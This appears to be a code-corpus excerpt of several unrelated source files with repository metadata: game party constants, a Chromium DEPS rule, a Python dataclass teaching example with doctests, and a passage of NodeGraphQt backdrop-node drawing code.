'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.FlyingHeart: {'cost': int(25 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.Hydra: {'cost': int(25 * PartyCostMultiplier),
'gridsize': (2, 2),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_propStage_2x2'},
DecorationIds.BannerVictory: {'cost': int(25 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.CannonVictory: {'cost': int(25 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.CogStatueVictory: {'cost': int(25 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.TubeCogVictory: {'cost': int(25 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.CogIceCreamVictory: {'cost': int(25 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.cogIceCreamWinter: {'cost': int(25 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.StageWinter: {'cost': int(25 * PartyCostMultiplier),
'gridsize': (2, 2),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_propStage_2x2'},
DecorationIds.CogStatueWinter: {'cost': int(25 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.snowman: {'cost': int(25 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.snowDoodle: {'cost': int(25 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'}}
DefaultRulesTimeout = 10.0
DenialReasons = IntEnum('DenialReasons', ('Default', 'Full', 'SilentFail'), start=0)
FireworkShows = IntEnum('FireworkShows', ('Summer',), start=200)
FireworksGlobalXOffset = 160.0
FireworksGlobalYOffset = -20.0
FireworksPostLaunchDelay = 5.0
RocketSoundDelay = 2.0
RocketDirectionDelay = 2.0
FireworksStartedEvent = 'PartyFireworksStarted'
FireworksFinishedEvent = 'PartyFireworksFinished'
FireworksTransitionToDisabledDelay = 3.0
TeamActivityTeams = IntEnum('TeamActivityTeams', ('LeftTeam', 'RightTeam'), start=0)
TeamActivityNeitherTeam = 3
TeamActivityTextScale = 0.135
TeamActivityStartDelay = 8.0
TeamActivityClientWaitDelay = 30.0
TeamActivityDefaultMinPlayersPerTeam = 1
TeamActivityDefaultMaxPlayersPerTeam = 4
TeamActivityDefaultDuration = 60.0
TeamActivityDefaultConclusionDuration = 4.0
TeamActivityStatusColor = VBase4(1.0, 1.0, 0.65, 1.0)
CogActivityBalanceTeams = True
CogActivityStartDelay = 15.0
CogActivityConclusionDuration = 12
CogActivityDuration = 90
CogActivityMinPlayersPerTeam = 1
CogActivityMaxPlayersPerTeam = 4
CogActivityColors = (VBase4(0.22, 0.4, 0.98, 1.0), VBase4(1.0, 0.43, 0.04, 1.0))
CogActivitySplatColorBase = VBase4(0.98, 0.9, 0.094, 1.0)
CogActivitySplatColors = (VBase4(CogActivityColors[0][0] / CogActivitySplatColorBase[0], CogActivityColors[0][1] / CogActivitySplatColorBase[1], CogActivityColors[0][2] / CogActivitySplatColorBase[2], 1.0), VBase4(CogActivityColors[1][0] / CogActivitySplatColorBase[0], CogActivityColors[1][1] / CogActivitySplatColorBase[1], CogActivityColors[1][2] / CogActivitySplatColorBase[2], 1.0))
CogPinataHeadZ = 4.7
CogActivityHitPoints = 1
CogActivityHitPointsForHead = 3
CogPinataPushBodyFactor = 0.05
CogPinataPushHeadFactor = CogPinataPushBodyFactor * abs(CogActivityHitPointsForHead - CogActivityHitPoints)
CogActivityAvgBeansPerSecond = 0.15
CogActivityBeansToAward = round(CogActivityAvgBeansPerSecond * CogActivityDuration * 2.0)
CogActivityWinBeans = int(round(CogActivityBeansToAward * 0.6))
CogActivityLossBeans = int(round(CogActivityBeansToAward * 0.4))
CogActivityTieBeans = int(round(CogActivityBeansToAward * 0.4))
CogActivityPerfectWinBeans = int(round(CogActivityBeansToAward * 0.75))
CogActivityPerfectLossBeans = int(round(CogActivityBeansToAward * 0.25))
CogActivityArenaLength = 50.0
CogActivityPieMinDist = 0.0
CogActivityPieMaxDist = 110.0
CogActivityPowerMeterHeight = 0.4
CogActivityPowerMeterWidth = 0.1
CogActivityPowerMeterPos = (0.33, 0.0, 0.0)
CogActivityPowerMeterTextPos = (0.33, -0.26)
CogActivityVictoryBarPos = (-0.55, 0.0, 0.825)
CogActivityVictoryBarOrangePos = (0.1725, 0.0, -0.0325)
CogActivityVictoryBarPiePos = (0.47, 0.0, -0.015)
CogActivityVictoryBarArrow = (0.0, 0.0, 0.1)
CogActivityBarUnitScale = 1.1
CogActivityBarStartScale = CogActivityBarUnitScale * 5
CogActivityBarPieUnitMove = 0.07
CogActivityBarPieScale = 1.5
CogActivityScorePos = (1.25, -0.45)
CogActivityScoreTitle = (1.24, -0.5)
CogActivityPowerMeterTime = 1.0
CogActivityShortThrowTime = 0.1
ToonAttackIdleThreshold = 5.0
ToonMoveIdleThreshold = 5.0
CogActivityShortThrowSpam = 3
CogActivitySpamWarningShowTime = 5.0
CogActivityControlsShowTime = 2.0
PARTY_COG_CUTOFF = 60
TugOfWarStartDelay = 8.0
TugOfWarReadyDuration = 1.5
TugOfWarGoDuration = 0.75
TugOfWarDuration = 40.0
TugOfWarMinimumPlayersPerTeam = 1
TugOfWarMaximumPlayersPerTeam = 4
TugOfWarStartGameTimeout = 8
TugOfWarJoinCollisionEndPoints = [Point3(6.0, 0.0, 0.0), Point3(-6.0, 0.0, 0.0)]
TugOfWarJoinCollisionRadius = 1.75
TugOfWarJoinCollisionPositions = [Point3(-10.5, 0.25, 4.5), Point3(10.5, -0.25, 4.5)]
TugOfWarInitialToonPositionsXOffset = 8.0
TugOfWarToonPositionXSeparation = 2.0
TugOfWarToonPositionZ = 2.55
TugOfWarTextWordScale = 0.135
TugOfWarTextCountdownScale = 4.0
TugOfWarCameraPos = Point3(0.0, -33.0, 10.0)
TugOfWarCameraInitialHpr = Point3(0.0, -6.91123, 0.0)
TugOfWarCameraLookAtHeightOffset = 6.0
TugOfWarPowerMeterSize = 17
TugOfWarPowerMeterRulesTarget = 8
TugOfWarDisabledArrowColor = VBase4(1.0, 0.0, 0.0, 0.3)
TugOfWarEnabledArrowColor = VBase4(1.0, 0.0, 0.0, 1.0)
TugOfWarHilightedArrowColor = VBase4(1.0, 0.7, 0.0, 1.0)
TugOfWarTargetRateList = [(8.0, 6),
(5.0, 7),
(6.0, 8),
(6.0, 10),
(7.0, 11),
(8.0, 12)]
TugOfWarKeyPressTimeToLive = 1.0
TugOfWarKeyPressUpdateRate = 0.1
TugOfWarKeyPressReportRate = 0.2
TugOfWarMovementFactor = 0.03
TugOfWarSplashZOffset = 1.0
TugOfWarHeadings = [240.0, 120.0]
TugOfWarConclusionDuration = 4.0
TugOfWarFallInWinReward = 15
TugOfWarFallInLossReward = 4
TugOfWarWinReward = 12
TugOfWarLossReward = 8
TugOfWarTieReward = 5
TugOfWarTieThreshold = 0.75
TrampolineDuration = 60.0
TrampolineSignOffset = Point3(-6.0, -6.0, 0.0)
TrampolineLeverOffset = Point3(-5.0, -9.0, 0.0)
TrampolineNumJellyBeans = 12
TrampolineJellyBeanBonus = 10
CatchActivityDuration = 80
CatchActivityBitmask = BitMask32(16)
CatchLeverOffset = Point3(-3.0, -2.0, 0.0)
CatchDropShadowHeight = 0.5
CatchConclusionDuration = 3.0
class DropObject:
def __init__(self, name, good, onscreenDurMult, modelPath):
self.name = name
self.good = good
self.onscreenDurMult = onscreenDurMult
self.modelPath = modelPath
def isBaseline(self):
return self.onscreenDurMult == 1.0
DropObjectTypes = [DropObject('apple', 1, 1.0, 'phase_4/models/minigames/apple'),
DropObject('orange', 1, 1.0, 'phase_4/models/minigames/orange'),
DropObject('pear', 1, 1.0, 'phase_4/models/minigames/pear'),
DropObject('coconut', 1, 1.0, 'phase_4/models/minigames/coconut'),
DropObject('watermelon', 1, 1.0, 'phase_4/models/minigames/watermelon'),
DropObject('pineapple', 1, 1.0, 'phase_4/models/minigames/pineapple'),
DropObject('anvil', 0, 0.4, 'phase_4/models/props/anvil-mod')]
Name2DropObjectType = {}
for type in DropObjectTypes:
Name2DropObjectType[type.name] = type
Name2DOTypeId = {}
names = list(Name2DropObjectType.keys())
names.sort()
for i in range(len(names)):
Name2DOTypeId[names[i]] = i
DOTypeId2Name = names
NumFruits = [{2000: 18,
1000: 19,
5000: 22,
4000: 24,
3000: 27,
9000: 28},
{2000: 30,
1000: 33,
5000: 38,
4000: 42,
3000: 46,
9000: 50},
{2000: 42,
1000: 48,
5000: 54,
4000: 60,
3000: 66,
9000: 71},
{2000: 56,
1000: 63,
5000: 70,
4000: 78,
3000: 85,
9000: 92}]
DancePatternToAnims = {'dduu': 'slip-backward',
'ldddud': 'happy-dance',
'lll': 'left',
'rdu': 'struggle',
'rrr': 'right',
'rulu': 'running-jump',
'udlr': 'good-putt',
'udllrr': 'victory',
'ulu': 'jump',
'uudd': 'slip-forward'}
DancePatternToAnims20 = {'ddd': 'down',
'dduu': 'slip-backward',
'drul': 'sad-walk',
'ldr': 'push',
'ldddud': 'happy-dance',
'ldu': 'sprinkle-dust',
'lll': 'left',
'llrr': 'firehose',
'lrlr': 'wave',
'rdu': 'struggle',
'rlrl': 'confused',
'rrr': 'right',
'rulu': 'running-jump',
'uddd': 'reel-neutral',
'udlr': 'good-putt',
'udud': 'angry',
'udllrr': 'victory',
'ulu': 'jump',
'uudd': 'slip-forward',
'uuu': 'up'}
DanceAnimToName = {'right': TTLocalizer.DanceAnimRight,
'reel-neutral': TTLocalizer.DanceAnimReelNeutral,
'conked': TTLocalizer.DanceAnimConked,
'happy-dance': TTLocalizer.DanceAnimHappyDance,
'confused': TTLocalizer.DanceAnimConfused,
'walk': TTLocalizer.DanceAnimWalk,
'jump': TTLocalizer.DanceAnimJump,
'firehose': TTLocalizer.DanceAnimFirehose,
'shrug': TTLocalizer.DanceAnimShrug,
'slip-forward': TTLocalizer.DanceAnimSlipForward,
'sad-walk': TTLocalizer.DanceAnimSadWalk,
'wave': TTLocalizer.DanceAnimWave,
'struggle': TTLocalizer.DanceAnimStruggle,
'running-jump': TTLocalizer.DanceAnimRunningJump,
'slip-backward': TTLocalizer.DanceAnimSlipBackward,
'down': TTLocalizer.DanceAnimDown,
'up': TTLocalizer.DanceAnimUp,
'good-putt': TTLocalizer.DanceAnimGoodPutt,
'victory': TTLocalizer.DanceAnimVictory,
'push': TTLocalizer.DanceAnimPush,
'angry': TTLocalizer.DanceAnimAngry,
'left': TTLocalizer.DanceAnimLeft}
DanceReverseLoopAnims = ['left',
'right',
'up',
'down',
'good-putt']
ToonDancingStates = IntEnum('ToonDancingStates', ('Init',
'DanceMove',
'Run',
'Cleanup'), start=0)
JUKEBOX_TIMEOUT = 30.0
MUSIC_PATH = 'phase_%s/audio/bgm/'
MUSIC_MIN_LENGTH_SECONDS = 50.0
MUSIC_GAP = 2.5
PhaseToMusicData = {3.5: {'TC_SZ.ogg': [TTLocalizer.MusicTcSz, 57]},
3: {'create_a_toon.ogg': [TTLocalizer.MusicCreateAToon, 175],
'tt_theme.ogg': [TTLocalizer.MusicTtTheme, 51]},
4: {'TC_nbrhood.ogg': [TTLocalizer.MusicTcNbrhood, 59],
'MG_TwoDGame.ogg': [TTLocalizer.MusicMgTwodgame, 60],
'MG_Vine.ogg': [TTLocalizer.MusicMgVine, 32],
'FF_safezone.ogg': [TTLocalizer.MusicFfSafezone, 47]},
6: {'DD_SZ.ogg': [TTLocalizer.MusicDdSz, 33],
'GS_SZ.ogg': [TTLocalizer.MusicGsSz, 60],
'OZ_SZ.ogg': [TTLocalizer.MusicOzSz, 31],
'GZ_SZ.ogg': [TTLocalizer.MusicGzSz, 59],
'MM_SZ.ogg': [TTLocalizer.MusicMmSz, 76]},
8: {'DG_SZ.ogg': [TTLocalizer.MusicDgSz, 48],
'DL_SZ.ogg': [TTLocalizer.MusicDlSz, 33],
'TB_SZ.ogg': [TTLocalizer.MusicTbSz, 54]},
9: {'encntr_hall_of_fame.ogg': [TTLocalizer.MusicEncntrHallOfFame, 51],
'encntr_head_suit_theme.ogg': [TTLocalizer.MusicEncntrHeadSuitTheme, 29]},
11: {'LB_juryBG.ogg': [TTLocalizer.MusicLbJurybg, 30]},
13: {'party_original_theme.ogg': [TTLocalizer.MusicPartyOriginalTheme, 56],
'party_generic_theme_jazzy.ogg': [TTLocalizer.MusicPartyGenericThemeJazzy, 64]}}
PhaseToMusicData40 = {3.5: {'encntr_general_bg.ogg': [TTLocalizer.MusicEncntrGeneralBg, 30],
'TC_SZ.ogg': [TTLocalizer.MusicTcSz, 57]},
3: {'create_a_toon.ogg': [TTLocalizer.MusicCreateAToon, 175],
'tt_theme.ogg': [TTLocalizer.MusicTtTheme, 51]},
4: {'minigame_race.ogg': [TTLocalizer.MusicMinigameRace, 77],
'TC_nbrhood.ogg': [TTLocalizer.MusicTcNbrhood, 59],
'MG_TwoDGame.ogg': [TTLocalizer.MusicMgTwodgame, 60],
'MG_CogThief.ogg': [TTLocalizer.MusicMgCogthief, 61],
'MG_Vine.ogg': [TTLocalizer.MusicMgVine, 32],
'MG_IceGame.ogg': [TTLocalizer.MusicMgIcegame, 56],
'FF_safezone.ogg': [TTLocalizer.MusicFfSafezone, 47]},
6: {'DD_SZ.ogg': [TTLocalizer.MusicDdSz, 33],
'GZ_PlayGolf.ogg': [TTLocalizer.MusicGzPlaygolf, 61],
'GS_SZ.ogg': [TTLocalizer.MusicGsSz, 60],
'OZ_SZ.ogg': [TTLocalizer.MusicOzSz, 31],
'GS_Race_CC.ogg': [TTLocalizer.MusicGsRaceCc, 58],
'GS_Race_SS.ogg': [TTLocalizer.MusicGsRaceSs, 61],
'GS_Race_RR.ogg': [TTLocalizer.MusicGsRaceRr, 60],
'GZ_SZ.ogg': [TTLocalizer.MusicGzSz, 59],
'MM_SZ.ogg': [TTLocalizer.MusicMmSz, 76],
'DD_nbrhood.ogg': [TTLocalizer.MusicDdNbrhood, 67],
'GS_KartShop.ogg': [TTLocalizer.MusicGsKartshop, 32]},
7: {'encntr_general_bg_indoor.ogg': [TTLocalizer.MusicEncntrGeneralBgIndoor, 31],
'encntr_suit_winning_indoor.ogg': [TTLocalizer.MusicEncntrGeneralSuitWinningIndoor, 36]},
8: {'DL_nbrhood.ogg': [TTLocalizer.MusicDlNbrhood, 30],
'DG_SZ.ogg': [TTLocalizer.MusicDgSz, 48],
'DL_SZ.ogg': [TTLocalizer.MusicDlSz, 33],
'TB_SZ.ogg': [TTLocalizer.MusicTbSz, 54]},
9: {'encntr_hall_of_fame.ogg': [TTLocalizer.MusicEncntrHallOfFame, 51],
'CHQ_FACT_bg.ogg': [TTLocalizer.MusicChqFactBg, 50],
'encntr_suit_winning.ogg': [TTLocalizer.MusicEncntrSuitWinning, 31],
'encntr_head_suit_theme.ogg': [TTLocalizer.MusicEncntrHeadSuitTheme, 29]},
11: {'LB_juryBG.ogg': [TTLocalizer.MusicLbJurybg, 30],
'LB_courtyard.ogg': [TTLocalizer.MusicLbCourtyard, 32]},
12: {'Bossbot_Factory_v1.ogg': [TTLocalizer.MusicBossbotFactoryV1, 30],
'BossBot_CEO_v1.ogg': [TTLocalizer.MusicBossbotCeoV1, 31]},
13: {'party_original_theme.ogg': [TTLocalizer.MusicPartyOriginalTheme, 56],
'party_polka_dance.ogg': [TTLocalizer.MusicPartyPolkaDance, 63],
'party_waltz_dance.ogg': [TTLocalizer.MusicPartyWaltzDance, 63],
'party_generic_theme_jazzy.ogg': [TTLocalizer.MusicPartyGenericThemeJazzy, 64]}}
def countMusic():
numMusic = 0
for key in PhaseToMusicData:
numMusic += len(PhaseToMusicData[key])
print('PhaseToMusicData %d' % numMusic)
numMusic = 0
for key in PhaseToMusicData40:
numMusic += len(PhaseToMusicData40[key])
print('PhaseToMusicData40 %d' % numMusic)
def getMusicRepeatTimes(length, minLength = MUSIC_MIN_LENGTH_SECONDS):
times = round(float(minLength) / length)
if minLength <= 0 or times < 1.0:
times = 1.0
return times
def sanitizePhase(phase):
if phase == int(phase):
phase = int(phase)
return phase
CANNON_TIMEOUT = 30
CANNON_MOVIE_LOAD = 1
CANNON_MOVIE_CLEAR = 2
CANNON_MOVIE_FORCE_EXIT = 3
CANNON_MOVIE_LANDED = 4
CannonJellyBeanReward = 2
CannonMaxTotalReward = 200
CatchMaxTotalReward = 1000
PartyCannonCollisions = {'clouds': ['cloudSphere-0'],
'bounce': ['wall_collision',
'discoBall_collision',
'platform_left_collision',
'platform_right_collision'],
'trampoline_bounce': 'TrampolineCollision',
'ground': ['floor_collision',
'danceFloor_collision',
'danceFloorRamp_collision',
'hill_collision',
'fence_floor'],
'fence': ['dockTube1_collision',
'dockTube2_collision',
'dockTube2_collision',
'dockTube2_collision',
'palm_collision_01',
'palm_collision_02',
'palm_collision_03',
'wall_1_collision',
'wall_2_collision',
'wall_3_collision',
'wall_4_collision',
'wall_5_collision',
'wall_6_collision',
'tree_collision',
'partyDecoration_collision',
'launchPad_railing_collision',
'launchPad_floor_collision',
'launchPad_collision',
'launchPad_railing2_collision',
'launchPad__rocket_collision',
'launchPad_lever_collision',
'launchPad_bridge_collision',
'launchPad_sphere2_collision',
'launchPad_sphere1_collision',
'partyClock_collision',
'sign_collision']}
def getCostOfParty(partyInfo):
newCost = 0
for activityBase in partyInfo.activityList:
newCost += ActivityInformationDict[activityBase.activityId]['cost']
for decorBase in partyInfo.decors:
newCost += DecorationInformationDict[decorBase.decorId]['cost']
return newCost
|
9b8754f2862c1046bf8a9479648d1b81ffc13f26
|
0577a46d8d28e1fd8636893bbdd2b18270bb8eb8
|
/chromium/ios/chrome/browser/ui/side_swipe/DEPS
|
94d0c0ba70e7d298ab32e0bc249a4cbd107e596a
|
[
"BSD-3-Clause"
] |
permissive
|
ric2b/Vivaldi-browser
|
388a328b4cb838a4c3822357a5529642f86316a5
|
87244f4ee50062e59667bf8b9ca4d5291b6818d7
|
refs/heads/master
| 2022-12-21T04:44:13.804535
| 2022-12-17T16:30:35
| 2022-12-17T16:30:35
| 86,637,416
| 166
| 41
|
BSD-3-Clause
| 2021-03-31T18:49:30
| 2017-03-29T23:09:05
| null |
UTF-8
|
Python
| false
| false
| 180
|
DEPS
|
specific_include_rules = {
# TODO(crbug.com/620932): Remove this exception.
"^side_swipe_controller\.h$": [
"+ios/web/web_state/ui/crw_swipe_recognizer_provider.h",
],
}
|
|
a02e93929a2f8751ff07ab3367c6ff71467a2446
|
1334dae619b127bedb8c7a2587021b6be596a1f5
|
/Chapter_4/ch04_ex5.py
|
9752b2f095ab4eb4b129cba0dafaff850108967c
|
[
"MIT"
] |
permissive
|
PacktPublishing/Mastering-Object-Oriented-Python-Second-Edition
|
236a04c7f0b72bb2350d44e1cb3bfb7d2067179b
|
f6d6517952d51e75c5e086f4c19d1e52500cf261
|
refs/heads/master
| 2023-02-02T06:33:49.821872
| 2023-01-30T08:50:52
| 2023-01-30T08:50:52
| 187,621,576
| 139
| 103
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,866
|
py
|
ch04_ex5.py
|
#!/usr/bin/env python3.7
"""
Mastering Object-Oriented Python 2e
Code Examples for Mastering Object-Oriented Python 2nd Edition
Chapter 4. Example 5.
"""
from dataclasses import dataclass
from enum import Enum
from typing import Iterator, cast, Iterable, Optional
@dataclass
class RTD:
rate: Optional[float]
time: Optional[float]
distance: Optional[float]
def compute(self) -> "RTD":
if (
self.distance is None and self.rate is not None and self.time is not None
):
self.distance = self.rate * self.time
elif (
self.rate is None and self.distance is not None and self.time is not None
):
self.rate = self.distance / self.time
elif (
self.time is None and self.distance is not None and self.rate is not None
):
self.time = self.distance / self.rate
return self
test_rtd = """
>>> r = RTD(distance=13.5, rate=6.1, time=None)
>>> r.compute()
RTD(rate=6.1, time=2.2131147540983607, distance=13.5)
"""
class Suit(str, Enum):
Club = "\N{BLACK CLUB SUIT}"
Diamond = "\N{BLACK DIAMOND SUIT}"
Heart = "\N{BLACK HEART SUIT}"
Spade = "\N{BLACK SPADE SUIT}"
@dataclass(frozen=True, order=True)
class Card:
rank: int
suit: str
@property
def points(self) -> int:
return self.rank
class Ace(Card):
@property
def points(self) -> int:
return 1
class Face(Card):
@property
def points(self) -> int:
return 10
def deck() -> Iterator[Card]:
for rank in range(1, 14):
for suit in cast(Iterable[Suit], Suit):
if rank == 1:
yield Ace(rank, suit)
elif rank >= 11:
yield Face(rank, suit)
else:
yield Card(rank, suit)
test_dataclass = """
>>> a = Card(7, Suit.Heart)
>>> a.rank
7
>>> a.suit
<Suit.Heart: '♥'>
>>> b = Card(7, Suit.Heart)
>>> a == b
True
>>> a < Card(8, Suit.Spade)
True
"""
test_hand = """
>>> import random
>>> random.seed(16)
>>> cards = list(deck())
>>> random.shuffle(cards)
>>> hand = cards[:5]
>>> any(c.rank == 1 for c in hand)
True
>>> any(c.points == 10 for c in hand)
True
>>> sum(c.points for c in hand)
34
>>> for c in hand:
... print(f"{c!r}: {c.points}")
Card(rank=3, suit=<Suit.Heart: '♥'>): 3
Ace(rank=1, suit=<Suit.Spade: '♠'>): 1
Face(rank=11, suit=<Suit.Club: '♣'>): 10
Face(rank=13, suit=<Suit.Spade: '♠'>): 10
Face(rank=12, suit=<Suit.Diamond: '♦'>): 10
>>> Ace(1, Suit.Spade) in set(hand)
True
"""
__test__ = {name: value for name, value in locals().items() if name.startswith("test_")}
if __name__ == "__main__":
import doctest
doctest.testmod(verbose=False)
|
ed6a708dd23245561461528ddb610a2948568bd2
|
8ce453de612c9024207d00d328df183c443c4e2d
|
/NodeGraphQt/qgraphics/node_backdrop.py
|
628d2186197cb650b0048a93d3c2099047d6a7d9
|
[
"MIT"
] |
permissive
|
jchanvfx/NodeGraphQt
|
71f946d7547f6b79c57ee2565d171a30c130a74e
|
4823b43642cce520ee88c5e89a0e1702c26ee9f0
|
refs/heads/main
| 2023-08-29T00:31:18.599300
| 2023-08-22T03:47:44
| 2023-08-22T03:47:44
| 101,639,727
| 1,015
| 255
|
MIT
| 2023-09-14T04:44:45
| 2017-08-28T12:13:27
|
Python
|
UTF-8
|
Python
| false
| false
| 10,718
|
py
|
node_backdrop.py
|
#!/usr/bin/python
from Qt import QtGui, QtCore, QtWidgets
from NodeGraphQt.constants import Z_VAL_PIPE, NodeEnum
from NodeGraphQt.qgraphics.node_abstract import AbstractNodeItem
from NodeGraphQt.qgraphics.pipe import PipeItem
from NodeGraphQt.qgraphics.port import PortItem
class BackdropSizer(QtWidgets.QGraphicsItem):
"""
Sizer item for resizing a backdrop item.
Args:
parent (BackdropNodeItem): the parent node item.
size (float): sizer size.
"""
def __init__(self, parent=None, size=6.0):
super(BackdropSizer, self).__init__(parent)
self.setFlag(self.ItemIsSelectable, True)
self.setFlag(self.ItemIsMovable, True)
self.setFlag(self.ItemSendsScenePositionChanges, True)
self.setCursor(QtGui.QCursor(QtCore.Qt.SizeFDiagCursor))
self.setToolTip('double-click auto resize')
self._size = size
@property
def size(self):
return self._size
def set_pos(self, x, y):
x -= self._size
y -= self._size
self.setPos(x, y)
def boundingRect(self):
return QtCore.QRectF(0.5, 0.5, self._size, self._size)
def itemChange(self, change, value):
if change == self.ItemPositionChange:
item = self.parentItem()
mx, my = item.minimum_size
x = mx if value.x() < mx else value.x()
y = my if value.y() < my else value.y()
value = QtCore.QPointF(x, y)
item.on_sizer_pos_changed(value)
return value
return super(BackdropSizer, self).itemChange(change, value)
def mouseDoubleClickEvent(self, event):
item = self.parentItem()
item.on_sizer_double_clicked()
super(BackdropSizer, self).mouseDoubleClickEvent(event)
def mousePressEvent(self, event):
self.__prev_xy = (self.pos().x(), self.pos().y())
super(BackdropSizer, self).mousePressEvent(event)
def mouseReleaseEvent(self, event):
current_xy = (self.pos().x(), self.pos().y())
if current_xy != self.__prev_xy:
item = self.parentItem()
item.on_sizer_pos_mouse_release()
del self.__prev_xy
super(BackdropSizer, self).mouseReleaseEvent(event)
def paint(self, painter, option, widget):
"""
Draws the backdrop sizer on the bottom right corner.
Args:
painter (QtGui.QPainter): painter used for drawing the item.
option (QtGui.QStyleOptionGraphicsItem):
used to describe the parameters needed to draw.
widget (QtWidgets.QWidget): not used.
"""
painter.save()
margin = 1.0
rect = self.boundingRect()
rect = QtCore.QRectF(rect.left() + margin,
rect.top() + margin,
rect.width() - (margin * 2),
rect.height() - (margin * 2))
item = self.parentItem()
if item and item.selected:
color = QtGui.QColor(*NodeEnum.SELECTED_BORDER_COLOR.value)
else:
color = QtGui.QColor(*item.color)
color = color.darker(110)
path = QtGui.QPainterPath()
path.moveTo(rect.topRight())
path.lineTo(rect.bottomRight())
path.lineTo(rect.bottomLeft())
painter.setBrush(color)
painter.setPen(QtCore.Qt.NoPen)
painter.fillPath(path, painter.brush())
painter.restore()
class BackdropNodeItem(AbstractNodeItem):
"""
Base Backdrop item.
Args:
name (str): name displayed on the node.
text (str): backdrop text.
parent (QtWidgets.QGraphicsItem): parent item.
"""
def __init__(self, name='backdrop', text='', parent=None):
super(BackdropNodeItem, self).__init__(name, parent)
self.setZValue(Z_VAL_PIPE - 1)
self._properties['backdrop_text'] = text
self._min_size = 80, 80
self._sizer = BackdropSizer(self, 26.0)
self._sizer.set_pos(*self._min_size)
self._nodes = [self]
def _combined_rect(self, nodes):
group = self.scene().createItemGroup(nodes)
rect = group.boundingRect()
self.scene().destroyItemGroup(group)
return rect
def mouseDoubleClickEvent(self, event):
viewer = self.viewer()
if viewer:
viewer.node_double_clicked.emit(self.id)
super(BackdropNodeItem, self).mouseDoubleClickEvent(event)
def mousePressEvent(self, event):
if event.button() == QtCore.Qt.LeftButton:
pos = event.scenePos()
rect = QtCore.QRectF(pos.x() - 5, pos.y() - 5, 10, 10)
item = self.scene().items(rect)[0]
if isinstance(item, (PortItem, PipeItem)):
self.setFlag(self.ItemIsMovable, False)
return
if self.selected:
return
viewer = self.viewer()
[n.setSelected(False) for n in viewer.selected_nodes()]
self._nodes += self.get_nodes(False)
[n.setSelected(True) for n in self._nodes]
def mouseReleaseEvent(self, event):
super(BackdropNodeItem, self).mouseReleaseEvent(event)
self.setFlag(self.ItemIsMovable, True)
[n.setSelected(True) for n in self._nodes]
self._nodes = [self]
def on_sizer_pos_changed(self, pos):
self._width = pos.x() + self._sizer.size
self._height = pos.y() + self._sizer.size
def on_sizer_pos_mouse_release(self):
size = {
'pos': self.xy_pos,
'width': self._width,
'height': self._height}
self.viewer().node_backdrop_updated.emit(
self.id, 'sizer_mouse_release', size)
def on_sizer_double_clicked(self):
size = self.calc_backdrop_size()
self.viewer().node_backdrop_updated.emit(
self.id, 'sizer_double_clicked', size)
def paint(self, painter, option, widget):
"""
Draws the backdrop rect.
Args:
painter (QtGui.QPainter): painter used for drawing the item.
option (QtGui.QStyleOptionGraphicsItem):
used to describe the parameters needed to draw.
widget (QtWidgets.QWidget): not used.
"""
painter.save()
painter.setPen(QtCore.Qt.NoPen)
painter.setBrush(QtCore.Qt.NoBrush)
margin = 1.0
rect = self.boundingRect()
rect = QtCore.QRectF(rect.left() + margin,
rect.top() + margin,
rect.width() - (margin * 2),
rect.height() - (margin * 2))
radius = 2.6
color = (self.color[0], self.color[1], self.color[2], 50)
painter.setBrush(QtGui.QColor(*color))
painter.setPen(QtCore.Qt.NoPen)
painter.drawRoundedRect(rect, radius, radius)
top_rect = QtCore.QRectF(rect.x(), rect.y(), rect.width(), 26.0)
painter.setBrush(QtGui.QBrush(QtGui.QColor(*self.color)))
painter.setPen(QtCore.Qt.NoPen)
painter.drawRoundedRect(top_rect, radius, radius)
for pos in [top_rect.left(), top_rect.right() - 5.0]:
painter.drawRect(
QtCore.QRectF(pos, top_rect.bottom() - 5.0, 5.0, 5.0))
if self.backdrop_text:
painter.setPen(QtGui.QColor(*self.text_color))
txt_rect = QtCore.QRectF(
top_rect.x() + 5.0, top_rect.height() + 3.0,
rect.width() - 5.0, rect.height())
painter.setPen(QtGui.QColor(*self.text_color))
painter.drawText(txt_rect,
QtCore.Qt.AlignLeft | QtCore.Qt.TextWordWrap,
self.backdrop_text)
if self.selected:
sel_color = [x for x in NodeEnum.SELECTED_COLOR.value]
sel_color[-1] = 15
painter.setBrush(QtGui.QColor(*sel_color))
painter.setPen(QtCore.Qt.NoPen)
painter.drawRoundedRect(rect, radius, radius)
txt_rect = QtCore.QRectF(top_rect.x(), top_rect.y(),
rect.width(), top_rect.height())
painter.setPen(QtGui.QColor(*self.text_color))
painter.drawText(txt_rect, QtCore.Qt.AlignCenter, self.name)
border = 0.8
border_color = self.color
if self.selected and NodeEnum.SELECTED_BORDER_COLOR.value:
border = 1.0
